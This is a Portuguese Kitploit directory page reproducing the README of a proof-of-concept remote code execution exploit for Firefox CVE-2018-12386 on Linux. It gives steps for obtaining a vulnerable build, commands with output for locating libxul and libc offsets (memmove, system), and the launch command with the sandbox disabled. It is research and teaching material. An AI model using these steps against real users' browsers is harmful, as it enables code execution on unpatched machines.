Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2018-12386 — CVE-2018-12386 - Exploit de RCE em sandbox do Firefox para Linux (Firefox <v62.0.3) | Kitploit
Ferramentas/GitHubGitHub/hydra3evil/cve-2018-12386
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPapers e PesquisaAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de Binários
GitHubhydra3evil/cve-2018-12386

cve-2018-12386

CVE-2018-12386 - Exploit de RCE em sandbox do Firefox para Linux (Firefox <v62.0.3)

Ver Repositório
2há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Firefox Sandboxed RCE Exploit (CVE-2918-12386)

Aqui está um exploit simples para a vulnerabilidade CVE-2018-12386 encontrada por Niklas Baumstark, Samuel Groß e Bruno Keith.

Isto é principalmente uma PoC que fiz por diversão, não há bypass de sandbox e só funcionará em uma configuração Linux específica onde os offsets usados pelo exploit já são conhecidos (eles podem ser alterados em exploit/offsets.js).

Este exploit funciona para versões anteriores ao Firefox 62.0.3 e Firefox ESR 60.2.2.

Baixando o Firefox para Testar o Exploit

Você pode baixar versões antigas do Firefox diretamente do servidor FTP da Mozilla: https://ftp.mozilla.org/pub/firefox/releases/

Você pode usar, por exemplo, a versão 62.0.2 para Linux 64 bits: https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2.

root@kitploit:~
wget https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2
bzip2 -d firefox-62.0.2.tar.bz2
tar xvf firefox-62.0.2.tar

Encontrando os Offsets

Offsets de libxul.so

libxul_math_max

Se você estiver usando o Firefox 62.0.2, os offsets fornecidos em exploit/offsets.js devem ser os corretos.

Para outras versões, uma maneira fácil de fazer isso é usar a primitiva addrof para vazar o endereço da função JavaScript Math.max, depois encontrar o endereço base de libxul.so para a instância do Firefox que você está explorando (com cat /proc/$(pidof firefox)/maps por exemplo) e subtrair os dois para obter o offset libxul_math_max.

libxul_got_memmove

Se você estiver usando o Firefox 62.0.2, os offsets fornecidos em exploit/offsets.js devem ser os corretos.

Para outras versões, uma maneira fácil de fazer isso é usar objdump.

root@kitploit:~
[asriel@core firefox-62.0.2]$ objdump -d libxul.so | grep -i memmove@GLIBC
  8006f0:   ff 25 7a ac 40 05       jmpq   *0x540ac7a(%rip)        # 5c0b370 <memmove@GLIBC_2.2.5>

5c0b370 é o valor que você precisa, ou seja, o offset de memmove em libxul.so.

Offsets de libc.so.6

Esses offsets dependem completamente da versão da libc que você usa.

root@kitploit:~
# libc.so.6 location

[asriel@core firefox-62.0.2]$ ldd /bin/ls | grep libc.so.6 | cut -d' ' -f3
/usr/lib/libc.so.6

libc_memmove

root@kitploit:~
[asriel@core firefox-62.0.2]$ nm /usr/lib/libc.so.6 | grep __memmove_avx_unaligned_erms
0000000000160c90 t __memmove_avx_unaligned_erms

libc_system

root@kitploit:~
[asriel@core firefox-62.0.2]$ nm /usr/lib/libc.so.6 | grep " system"
0000000000044dd0 W system

Testando o Exploit

Depois de ter o Firefox e os offsets corretos, você pode testar o exploit executando o seguinte comando:

root@kitploit:~
MOZ_DISABLE_CONTENT_SANDBOX=1 /path/to/vulnerable/firefox /path/to/cve-2018-12386/exploit/pwn.html

Demo

Contato

Se quiser dizer oi: @Asri3l

Baixar ferramenta